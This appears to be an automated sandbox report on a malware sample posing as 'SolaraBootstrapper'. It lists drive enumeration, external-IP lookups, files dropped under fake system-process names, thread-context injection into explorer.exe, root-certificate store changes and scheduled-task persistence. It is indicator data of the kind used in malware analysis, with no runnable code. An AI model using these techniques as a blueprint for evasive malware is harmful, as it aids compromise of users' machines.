File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\sv-SE\cmd.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\SysWOW64\sv-SE\ebf1f9fa8afd6d C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\m6dw6b.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2520 set thread context of 2388 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Common Files\Services\6203df4a6bafc7 C:\winNet\wscript.exe.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Defender\es-ES\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Updater6\smss.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Updater6\69ddcba757bf72 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Journal\fr-FR\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Portable Devices\dwm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\b75386f1303e64 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Windows Journal\fr-FR\conhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\42af1c969fbb7b C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\dwm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files\Windows Portable Devices\6cb0b6c459d5d3 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files\Common Files\Services\lsass.exe C:\winNet\wscript.exe.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Journal\fr-FR\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Defender\es-ES\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Offline Web Pages\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSI58FF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI59BC.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\Downloaded Program Files\explorer.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Prefetch\ReadyBoot\7a0fd90576e088 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\a0b1fd4c5438e9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\de-DE\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Installer\f7753ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7753ea.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Downloaded Program Files\explorer.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\133006b48fb54b C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\de-DE\24dbde2999530e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSI59AC.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Downloaded Program Files\7a0fd90576e088 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Offline Web Pages\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\Offline Web Pages\Refcrt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\diagnostics\system\DeviceCenter\es-ES\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Prefetch\ReadyBoot\explorer.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
